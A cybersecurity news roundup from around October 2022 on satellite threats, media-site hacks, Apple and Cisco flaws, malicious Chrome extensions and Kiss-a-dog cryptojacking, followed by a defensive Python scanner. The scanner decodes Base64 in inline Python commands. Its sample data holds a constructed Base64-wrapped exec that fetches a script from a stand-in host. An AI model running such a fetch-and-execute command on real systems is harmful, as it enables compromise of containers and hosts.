Russian Satellite Alert, New York Post Hacked, Fast Company Breach

Russia warns the West: we can target your commercial satellites

The warning comes from Konstantin Vorontsov, a senior official and deputy director of the Russian Foreign Ministry’s department for non-proliferation and arms control, speaking to the United Nations. He said the commercial satellites of the United States and its allies could become legitimate targets for Russia if they were involved in the war in Ukraine. Vorontsov did not mention any specific satellite company, although Elon Musk said earlier this month that his rocket company SpaceX would continue to fund its Starlink internet service in Ukraine, citing the need for “good deeds”.

(Reuters)

The New York Post says it was hacked after offensive tweets were posted

The New York Post said it was hacked on Thursday after several offensive articles and tweets were published on the newspaper’s website and Twitter account. The posts and tweets, racist and violent in nature, were taken down shortly thereafter. It is believed that the New York Post’s content management system, used to publish stories and articles, may have been hacked. The offensive tweets were sent via SocialFlow, a popular website plugin used to spread stories on social media sites. The tweets also contained links pointing to pages on the Post’s website, which quickly became inaccessible.

(TechCrunch)

White House announces 100-day chemical sector cybersprint

The chemical sector is the most recent to embark on President Biden’s 100-day cybersecurity sprint, the administration announced Wednesday, an effort to draw operators’ attention to the most important risks of a digital attack, such as gas leaks and other contamination. The sprint also aims to improve information sharing and “analytical coordination” between the public and private sectors and to encourage chemical manufacturers to deploy threat detection on control systems. The sprints were first launched as a pilot with the power sector in April 2021 and have been followed by the pipeline, water and railway sectors.

(CyberScoop)

Pizza123 Password Behind Fast Company Breach

The breach of the Fast Company news channel that occurred in late September was carried out by exploiting an easy-to-guess default password, “pizza123”. The business magazine reused the weak password on a dozen WordPress accounts, according to the hacker, who goes by the name “Thrax” and described the attack as “ridiculously easy” in an article published on FastCompany.com before the publication took the site down. The hackers claimed to have used the pizza123 password to access authentication tokens, Apple News API keys, and Amazon Simple Email Service (SES) tokens. They then sent offensive push notifications to the home screens of subscribers to the Fast Company channel on the Apple News service.

(Bleeping Computer)

Apple iOS and macOS flaw could have allowed apps to listen to Siri conversations

A now-patched security flaw in Apple’s iOS and macOS operating systems could have allowed apps with Bluetooth access to eavesdrop on conversations with Siri. Apple said “an app may be able to record audio using a pair of connected AirPods,” adding that it fixed the Core Bluetooth issue in iOS 16.1 with improved entitlements. App developer Guilherme Rambo is credited with discovering and reporting the bug in August 2022. The bug, dubbed SiriSpy, was given the identifier CVE-2022-32946.

(The Hacker News)

Cisco Warns of Active Exploit Attempts Targeting Cisco AnyConnect Secure Mobility Client for Windows

Cisco is warning of exploit attempts targeting two security vulnerabilities, tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities date from 2020 and are now patched. The CVE-2020-3153 flaw resides in the installer component of AnyConnect Secure Mobility Client for Windows. An authenticated local attacker can exploit it to copy user-supplied files to system-level directories with system-level privileges. The CVE-2020-3433 vulnerability resides in the interprocess communication (IPC) channel of the Cisco AnyConnect Secure Mobility Client for Windows. An authenticated local attacker can exploit the issue to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.

(Security Affairs)

Chrome extensions with 1 million installs hijack target browsers

Guardio Labs researchers have uncovered a new malvertising campaign pushing Google Chrome extensions that hijack searches and insert affiliate links into web pages. Because all of these extensions offer color customization options and arrive on the victim’s machine without malicious code in order to evade detection, analysts have named the campaign “Dormant Colors”. According to the Guardio report, as of mid-October 2022, 30 variants of the browser extensions were available on both the Chrome and Edge online stores, amassing over one million installs. When these extensions are first installed, they redirect users to various pages that load malicious scripts, which tell the extension how to perform search hijacking and on which sites to insert affiliate links.

(Bleeping Computer)

New cryptojacking campaign targeting vulnerable Docker and Kubernetes instances

Cybersecurity firm CrowdStrike has dubbed the activity Kiss-a-dog. Its command-and-control infrastructure overlaps with that associated with other groups such as TeamTNT, which are notorious for hitting misconfigured Docker and Kubernetes instances. The intrusions, spotted in September, take their name from a domain called “kiss.a-dog[.]top”, which is used to trigger a shell script payload on the compromised container using a Base64-encoded Python command.

(The Hacker News)
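
For defenders, the Base64-encoded Python command mentioned above is something that can be looked for in container process logs. The following is an added example, not code from CrowdStrike or from the original roundup: it flags inline `python -c` commands, decodes any Base64 arguments and reports URLs hidden inside them. The event format, the wrapper form of the command and the `.invalid` host names are assumptions constructed for illustration.

```python
import base64
import binascii
import re

PY_INLINE = re.compile(r"\bpython[\d.]*\s+-c\b")       # python -c / python3 -c
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")      # long base64-looking runs
URL = re.compile(r"https?://[^\s'\"\\)]+")


def inspect(cmdline):
    """Return URLs hidden in base64 arguments of an inline Python command."""
    if not PY_INLINE.search(cmdline):
        return []
    urls = []
    for run in B64_RUN.findall(cmdline):
        try:
            text = base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text once decoded
        urls.extend(URL.findall(text))
    return urls


def scan(events):
    """events: iterable of (container_name, cmdline); returns flagged pairs."""
    return [(name, urls) for name, cmd in events if (urls := inspect(cmd))]


# Constructed sample data. The wrapper form and the .invalid hosts are assumptions.
_inner = "import urllib.request;urllib.request.urlopen('http://payload.example.invalid/t.sh')"
_b64 = base64.b64encode(_inner.encode()).decode()
SAMPLE_EVENTS = [
    ("web-7f9c", f"python -c \"import base64;exec(base64.b64decode('{_b64}'))\""),
    ("web-7f9c", "python3 /app/manage.py migrate"),
    ("job-12ab", "python -c \"print('hello')\""),
    ("api-55de", f"curl -H 'X-Token: {_b64}' http://internal.example.invalid/health"),
]

if __name__ == "__main__":
    for name, urls in scan(SAMPLE_EVENTS):
        print(f"ALERT container={name} decoded_urls={urls}")
```

Only the first constructed event is flagged: the plain script run, the harmless one-liner and the non-Python command carrying the same Base64 string are all ignored.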
